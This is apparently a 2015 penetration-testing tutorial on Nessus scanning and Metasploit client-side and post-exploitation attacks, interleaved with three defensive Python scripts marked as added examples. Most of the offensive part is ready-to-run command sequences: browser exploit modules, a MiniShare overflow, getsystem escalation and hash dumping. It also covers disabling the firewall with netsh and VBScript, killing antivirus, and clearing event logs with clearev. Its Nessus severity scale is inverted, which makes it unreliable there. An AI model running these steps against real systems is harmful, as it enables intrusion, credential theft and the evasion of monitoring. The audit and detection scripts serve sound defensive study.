Nessus and POST Exploitation in MetaSPLOIT

Friday, 15 May 2015

Nessus Basics

Nessus is a proprietary vulnerability scanner.
It detects
> vulnerabilities
> misconfigurations
> default credentials on the target system
It is also used in various compliance audits.
  Learn how to use Meterpreter in Metasploit => Meterpreter Basics

Metasploit Basics => Metasploit Basics

To load Nessus in Metasploit
    msfconsole -> type load nessus -> nessus_help

Connect to the Nessus server on localhost to start the scans
    nessus_connect <your username>:<your password>@localhost:8834 <ok>
    nessus_connect prasoonnigam:hacker09@localhost:8834 ok
8834 is the default Nessus port; the trailing "ok" accepts the server's SSL certificate warning.

Check the Nessus scanning policies

    nessus_policy_list

Four policies of Nessus
1) External network scan -> used for scanning network vulnerabilities from outside the network
2) Internal network scan -> used for scanning network vulnerabilities from inside the network
3) Web App Tests -> used for scanning web applications for vulnerabilities
4) PCI-DSS (Payment Card Industry Data Security Standard) audits -> used for compliance audits against the payment card industry's data security standard

Scanning the victim machine

> create a new scan
    nessus_scan_new <policy ID> <scan name> <target ip>
    nessus_scan_new -2 windowsscan
> check the scan status
    nessus_scan_status
> check the report list
    nessus_report_list
> open the report
    nessus_report_hosts <report ID>
    example : nessus_report_hosts dgfwef82nd8934y89hg9rety389
>> the Severity column gives the total number of vulnerabilities found on each host

Classification of the different vulnerabilities

> Sev 0 indicates high-level vulnerabilities
> Sev 1 indicates medium-level vulnerabilities
> Sev 2 indicates low-level vulnerabilities
> Sev 3 indicates informational vulnerabilities

Command to see all the vulnerabilities on a host

    nessus_report_host_ports <target IP> <report id>
    example : nessus_report_host_ports asjfh398fdbf5t705tdb4t9

Report Importing in Metasploit

> Importing an Nmap report into the PostgreSQL database via msfconsole
    scan the host with Nmap and save the report in XML format

>> Check the database connectivity from msfconsole
    syntax : db_status

> import the Nmap report
    syntax: db_import <report path with file name>
    example: db_import /root/Desktop/scan.xml

>> see the host details
    syntax: hosts <ip or hostname on which the nmap scan was performed>
    example: hosts
this lists the OS and MAC address of each host

>> check the open ports and the services running on those ports
    syntax: services <hostname>
    example: services

> Importing a Nessus report into msfconsole
    syntax:    db_import <report path with file name>
    example: db_import /root/Desktop/Nessus_scan.nessus

> check the vulnerabilities
    syntax: vulns <ip (hostname)>
    example: vulns
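As an added example (not code from the original post or from Metasploit), the script below parses a Nessus v2 report, the same .nessus XML that db_import reads, and prints per host what the hosts, services and vulns commands show: OS, MAC address, listening services, and a tally of findings per numeric severity value as used in the severity classification above. The XML embedded in the script is constructed sample data; the IP, MAC, plugin IDs and plugin names are made up.

```python
# Added example (not from the original post): parse a Nessus v2 report (.nessus XML),
# the file format db_import consumes, and summarise it the way the msfconsole
# hosts / services / vulns commands do. The XML below is constructed sample data.
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed .nessus fragment: one host, two findings on open ports plus one
# host-level informational finding. All values are made up.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
 <Report name="windowsscan">
  <ReportHost name="192.168.56.101">
   <HostProperties>
    <tag name="host-ip">192.168.56.101</tag>
    <tag name="operating-system">Microsoft Windows XP Service Pack 3</tag>
    <tag name="mac-address">08:00:27:aa:bb:cc</tag>
   </HostProperties>
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
               pluginID="100001" pluginName="SMB remote code execution (constructed)">
    <description>Constructed description.</description>
   </ReportItem>
   <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
               pluginID="100002" pluginName="Web server information disclosure (constructed)">
    <description>Constructed description.</description>
   </ReportItem>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
               pluginID="100003" pluginName="OS identification (constructed)">
    <description>Constructed description.</description>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""

def parse_nessus(xml_text):
    """Return a list of host dicts: ip, os, mac, services (port/proto/svc) and vulns."""
    root = ET.fromstring(xml_text)
    hosts = []
    for rh in root.iter("ReportHost"):
        # HostProperties holds name/value tags such as host-ip and operating-system
        props = {t.get("name"): (t.text or "") for t in rh.iter("tag")}
        host = {
            "ip": props.get("host-ip", rh.get("name")),
            "os": props.get("operating-system", "unknown"),
            "mac": props.get("mac-address", ""),
            "services": set(),
            "vulns": [],
        }
        for item in rh.iter("ReportItem"):
            port = int(item.get("port", "0"))
            if port:  # port 0 is a host-level finding, not a listening service
                host["services"].add((port, item.get("protocol"), item.get("svc_name")))
            host["vulns"].append({
                "port": port,
                "severity": int(item.get("severity", "0")),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName"),
            })
        hosts.append(host)
    return hosts

def severity_counts(host):
    """Tally findings per numeric severity value, which is what the Severity column totals."""
    return dict(Counter(v["severity"] for v in host["vulns"]))

if __name__ == "__main__":
    for h in parse_nessus(SAMPLE_NESSUS):
        print(h["ip"], h["os"], h["mac"])
        for svc in sorted(h["services"]):
            print("  service", *svc)
        print("  findings by severity:", severity_counts(h))
```

Pointing parse_nessus at a real exported report (open the file and pass its contents) gives the same per-host view without importing it into the database first, which is handy for a quick triage of what a scan found before deciding what to load into msfconsole.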

Client Side Exploitation

What are Client Side Attacks?

> The server is the computer that shares its resources over the network; the clients are the other computers on the network that use these resources.

> There is a large array of attacks that may be launched against clients, such as
> browser-based attacks
> vulnerable service exploitation
> attacks on the many applications a client OS runs, such as PDF readers, document readers and instant messengers

> The malicious code may exploit any form of ActiveX, Java or Flash content in the browser.

Exploiting the victim's browser

> browser autopwn
    msfconsole -> use auxiliary/server/browser_autopwn -> show options -> set LHOST (required; the address the payload connects back to) -> set SRVHOST (the address of our local machine on which the malicious web server listens) -> set SRVPORT 80 (the local port the web server listens on) -> run

after typing run, it starts the exploit modules on the localhost and prints the malicious URL, which must be given to the victim and clicked

    -> to check the meterpreter session that was created, type "sessions"

(getting into the computer and using the session)
-> sessions (shows the ID) -> sessions -i <id> -> sysinfo

> Internet Explorer Shortcut Icon Exploit
    shortcut icons that contain a malicious DLL

    msfconsole -> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1

> Internet Explorer malicious VBScript code execution exploit

    msfconsole -> use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 -> show options -> set SRVHOST -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL
after F1 is pressed the malicious VBScript runs in the browser and delivers a payload named calc.exe -> sessions -> sessions -i 1

POST Exploitation

    Post exploitation covers the phases of operation once a victim's system has been compromised by the attacker. The value of the compromised system is determined by the value of the data stored on it and how an attacker may make use of it for malicious purposes.
    The concept of post exploitation arises from this: how to use the information on the victim's compromised system, document it, and get an idea of the configuration channels.

Phases of post exploitation
> Understanding the victim
> Privilege escalation
> Cleaning tracks and staying undetected
> Collecting system information and data
> Setting up backdoors and rootkits
> Pivoting to penetrate internal networks

Let's start the first phase of post exploitation by gathering as much information as possible

Type in :
    sysinfo (get system info)
    getpid (get the process ID of the current process)
    ps (get the process list)
    run checkvm (check whether the victim's system is a virtual machine or not)
    idletime (check whether the victim is active or not)
    run get_env (dump the victim's system environment with another meterpreter script)
    ipconfig (check the victim's system IP address)
    route (see the full network settings)
    run getcountermeasure (map the security configuration of the victim's system)
    run getgui (enable the victim's Remote Desktop Protocol service)
    run getgui -e
    run gettelnet (enable the telnet service)
    run gettelnet -e
    run get_local_subnets (see the victim's local subnets)
    run hostedit (allows an attacker to add host entries in the Windows hosts file)
    run hostedit -e
    run enum_logged_on_users (how many users are currently logged in)
    run enum_logged_on_users -c
    run get_application_list (shows all the installed applications)
    run windows/gather/forensics/enum_drives (enumerate physical drives)
    run windows/gather/enum_ms_product_keys (get the OS product key)
    run windows/gather/credentials/windows_autologin (check the autologin feature)
    run winenum (dump juicy information such as hashes and tokens)
    cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> ls
    cat hashdump.txt
    run scraper
    .msf4/logs/scripts/scraper/ -> cat services.txt

Post Exploitation Privilege Escalation

> Post exploitation is divided into five phases

Understanding Privilege Escalation
    Privilege escalation, in simple terms, is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users.
Examples of what can be done after privilege escalation:
> installing malicious software for unethical uses
> deleting user files
> denying resources to a particular user
> viewing private information

Divided into two major forms :-
> Vertical Privilege Escalation
> Horizontal Privilege Escalation

Vertical Privilege Escalation
    A lower-privileged user or application gains access to functions that are reserved for authorized or administrative users. This is also known as privilege elevation.

Horizontal Privilege Escalation
    This escalation happens horizontally with respect to user rights: a normal user accesses resources reserved for another user at the same privilege level.

Exploiting the victim's system
> we use a piece of software called MiniShare (free file sharing software)

    open msfconsole -> use exploit/windows/http/minishare_get_overflow -> show options -> set RHOST (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose from the listed targets) -> exploit ->

(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps

Privilege escalation by post exploitation
    This module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.

(Meterpreter)     run post/windows/escalate/getsystem

        run post/windows/escalate/service_permissions
(This module exploits existing administrative privileges to obtain a SYSTEM session. If that fails in the first instance, the module inspects the existing services and looks for insecure file permissions that are vulnerable to attack.)
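The insecure file permissions the service_permissions module looks for are also what an administrator should audit before an attacker does. The script below is an added example, not code from the post or from Metasploit: it parses icacls-style output for service binaries and flags any binary that a low-privileged principal (Everyone, BUILTIN\Users, Authenticated Users) can modify, because a service that runs as SYSTEM will happily start a replaced executable. The paths and ACLs in the sample are constructed; the "binary path ends in an executable extension" rule used to split the first icacls line is an assumption made here to cope with paths that contain spaces.

```python
# Added example (not from the original post): audit Windows service binary permissions
# the way the service_permissions check looks for insecure file permissions.
# Input is constructed icacls-style output; paths and ACLs are made up.
import re

# Constructed output in the shape `icacls <path>` prints: the first line carries the
# path followed by the first ACE, continuation lines are indented, and each ACE is
# PRINCIPAL:(flags)(rights) with rights either simple (F, M, RX, R, W) or specific (WD, AD, ...).
SAMPLE_ICACLS = r"""C:\Program Files\GoodSvc\goodsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
                                    BUILTIN\Administrators:(I)(F)
                                    BUILTIN\Users:(I)(RX)

C:\Apps\WeakSvc\weaksvc.exe NT AUTHORITY\SYSTEM:(F)
                            BUILTIN\Administrators:(F)
                            Everyone:(M)

C:\Apps\WriteOnly\svc.exe BUILTIN\Administrators:(F)
                          NT AUTHORITY\Authenticated Users:(RX,WD)
"""

# Principals every local user is a member of; write access for them lets a
# low-privileged account replace a binary that the service later runs as SYSTEM.
LOW_PRIV_PRINCIPALS = {"everyone", r"builtin\users", r"nt authority\authenticated users"}
# Simple or specific rights that allow changing the file's contents.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC"}
# Inheritance flags that icacls prints alongside the rights and that are not rights.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# Assumption: the path on the first line ends in an executable extension, which is how
# we tell where a path containing spaces stops and the first ACE begins.
PATH_RE = re.compile(r"^(?P<path>[A-Za-z]:\\.+?\.(?:exe|dll|sys))\s+(?P<ace>.+)$", re.IGNORECASE)

def parse_ace(ace_text):
    """Split 'PRINCIPAL:(I)(RX,WD)' into (principal, set of rights, is_deny)."""
    principal, _, rights_part = ace_text.partition(":")
    groups = re.findall(r"\(([^)]*)\)", rights_part)
    tokens = {t.strip() for g in groups for t in g.split(",") if t.strip()}
    deny = "DENY" in tokens  # icacls marks deny ACEs with a (DENY) group
    return principal.strip(), tokens - INHERIT_FLAGS - {"DENY"}, deny

def parse_icacls(text):
    """Return {path: [(principal, rights, deny), ...]} from icacls output."""
    acls = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw[:1].isspace() and current is not None:
            ace_text = raw.strip()  # continuation line: another ACE for the same path
        else:
            m = PATH_RE.match(raw.strip())
            if not m:
                raise ValueError(f"unparsed icacls line: {raw!r}")
            current = m.group("path")
            acls[current] = []
            ace_text = m.group("ace")
        acls[current].append(parse_ace(ace_text))
    return acls

def weak_service_binaries(acls):
    """Return {path: [principal, ...]} for binaries writable by low-privileged principals."""
    findings = {}
    for path, aces in acls.items():
        weak = [p for p, rights, deny in aces
                if not deny and p.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS]
        if weak:
            findings[path] = weak
    return findings

if __name__ == "__main__":
    for path, who in weak_service_binaries(parse_icacls(SAMPLE_ICACLS)).items():
        print(f"WEAK: {path} is writable by {', '.join(who)}")
```

On a real host the input would come from running icacls against each service's binary path (taken from `sc qc <service>`); the fix for any finding is to remove the write rights from the low-privileged principal so that only Administrators and SYSTEM can change the file.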

Another exploit for compromising the target system
    msf> use exploit/windows/browser/ms10_002_aurora -> show options -> set SRVHOST (our local machine address, as above) -> exploit -> sessions -> sessions -i 1

Post Exploitation: Cleaning Up Traces
    Cleaning tracks and traces through log deletion, and staying undetected by disabling the firewall and antivirus systems

Why is a firewall important?
A firewall is software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets, deciding whether each packet should be allowed through or not.

A firewall is classified into three different types:
> Packet Filter Firewall
> Stateful Firewall
> Application Firewall

Packet Filter Firewall
    These firewalls work on the first three layers of the OSI model, with a little help from the transport layer for the source and destination port numbers. When a packet arrives at a packet filter firewall, it is checked against a set of rules.

Stateful Firewall
    These are also called second-generation firewalls. They work on the state of a network connection, and use that state to decide whether to allow the packet into the network or not.

Application Firewall
    These are known as third-generation firewalls. Application firewalls work at the application layer on protocols like HTTP, SMTP and SSH. They also help in detecting whether an unwanted protocol is trying to bypass the firewall on an allowed port.

    run getcountermeasure
        operational mode         = Enable

To see whether the firewall is enabled or not:
        -> shell -> netsh firewall show opmode
To disable it:
        -> shell -> netsh firewall set opmode mode=disable

Disabling firewalls through VBScript

        Set objFirewall = CreateObject("HNetCfg.FwMgr")
        Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
        objPolicy.FirewallEnabled = FALSE
save the code with a .vbs extension

syntax        upload <source filepath> <destination filepath>
Example       upload /root/Desktop/disable.vbs C:\

    Go to the destination and execute it

Antivirus Killing and Log Deletion

Killing the processes of an antivirus with the help of the post exploitation Meterpreter script known as killav

Script: killav.rb

The antivirus process name must be listed in killav.rb; only then can the antivirus be stopped.

(Meterpreter) run killav -> tasklist (to see the Task Manager process list) or tasklist /svc or tasklist /svc | find /I "avg"

> To see the properties of the running processes
        sc queryex avgwd -> sc config <service name> start= disabled (disables a service whose process cannot be killed)
Terminating a process
    taskkill /F /IM "antivirus name*"

Clearing tracks to be SAFE

Clearing all the logs
 (Meterpreter) clearev
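Every step in this cleanup section leaves a trace of its own on a host that audits process creation, service configuration changes and log clearing. The script below is an added example, not code from the post or from Metasploit, written from the defender's side: it runs a few detection rules over Windows event log records for the firewall disabling via netsh, the sc config start= disabled and taskkill /F /IM steps, and the clearev log wipe. The event IDs are the standard Windows ones (4688 process creation with command-line auditing enabled, 7040 service start type changed, 1102 Security log cleared, 104 System log cleared); the pipe-separated line format and every record in the sample are constructed for this example, not real EVTX output.

```python
# Added example (not from the original post): detection rules for the cleanup
# tradecraft described above, run over constructed Windows event log records.
# Record format (constructed, not real EVTX): timestamp|Key=Value|Key=Value|...
import re

# Constructed sample: a benign process start, the firewall being disabled, an AV
# service disabled with sc config (and the matching 7040), a forced taskkill, a
# benign service change, and the Security and System logs being cleared.
SAMPLE_EVENTS = [
    "2015-05-15T10:00:01Z|Channel=Security|EventID=4688|User=LAB\\alice|CommandLine=notepad.exe report.txt",
    "2015-05-15T10:02:14Z|Channel=Security|EventID=4688|User=LAB\\alice|CommandLine=netsh firewall set opmode mode=disable",
    "2015-05-15T10:02:40Z|Channel=Security|EventID=4688|User=LAB\\alice|CommandLine=sc config avgwd start= disabled",
    "2015-05-15T10:02:41Z|Channel=System|EventID=7040|Service=avgwd|OldStart=auto start|NewStart=disabled",
    "2015-05-15T10:03:05Z|Channel=Security|EventID=4688|User=LAB\\alice|CommandLine=taskkill /F /IM \"avg*\"",
    "2015-05-15T10:05:00Z|Channel=System|EventID=7040|Service=wuauserv|OldStart=demand start|NewStart=auto start",
    "2015-05-15T10:09:59Z|Channel=Security|EventID=1102|User=LAB\\alice",
    "2015-05-15T10:10:00Z|Channel=System|EventID=104|User=LAB\\alice",
]

# Both the legacy `netsh firewall set opmode ... disable` form used above and the
# newer `netsh advfirewall set <profile> state off` form.
NETSH_FW_OFF = re.compile(
    r"netsh\s+(?:firewall\s+set\s+opmode\b.*\bdisable|advfirewall\s+set\s+.*\bstate\s+off)", re.I)
# `sc config <service> start= disabled`, capturing the service name.
SC_DISABLE = re.compile(r"\bsc(?:\.exe)?\s+config\s+(\S+)\s+start=\s*disabled", re.I)

def parse_event(line):
    """Turn one constructed 'timestamp|Key=Value|...' record into a dict."""
    ts, *fields = line.split("|")
    ev = {"Timestamp": ts}
    for field in fields:
        key, _, value = field.partition("=")  # values may themselves contain '='
        ev[key] = value
    return ev

def detect(ev):
    """Return a list of (rule, detail) tuples that fire on one parsed event."""
    hits = []
    eid, chan = ev.get("EventID"), ev.get("Channel")
    cmd = ev.get("CommandLine", "")
    # clearev wipes Application, System and Security; the two cleared-log events survive it
    if (eid, chan) == ("1102", "Security"):
        hits.append(("log_cleared", "Security audit log cleared"))
    elif (eid, chan) == ("104", "System"):
        hits.append(("log_cleared", "System event log cleared"))
    if eid == "4688":
        tokens = cmd.lower().split()
        if NETSH_FW_OFF.search(cmd):
            hits.append(("firewall_disabled", cmd))
        m = SC_DISABLE.search(cmd)
        if m:
            hits.append(("service_disabled", f"sc config disabled {m.group(1)}"))
        # taskkill with both /F (force) and /IM (by image name) is the AV-killing pattern
        if tokens and tokens[0].split("\\")[-1] in ("taskkill", "taskkill.exe") \
                and "/f" in tokens and "/im" in tokens:
            hits.append(("forced_kill", cmd))
    # 7040 fires for any start-type change; only a change to disabled is suspicious here
    if eid == "7040" and ev.get("NewStart", "").lower() == "disabled":
        hits.append(("service_disabled", f"{ev.get('Service')} start type changed to disabled"))
    return hits

def scan_events(lines):
    """Run every rule over the records; return (timestamp, rule, detail) alerts in order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for rule, detail in detect(ev):
            alerts.append((ev["Timestamp"], rule, detail))
    return alerts

if __name__ == "__main__":
    for ts, rule, detail in scan_events(SAMPLE_EVENTS):
        print(ts, rule, detail)
```

The point of correlating these is that the sequence itself is the signal: a firewall disabled, a security service set to disabled, a forced image kill and then both logs cleared within a few minutes by the same account is hard to explain as administration. Because clearev removes the local copies, the records only help if they are forwarded to a collector before the wipe.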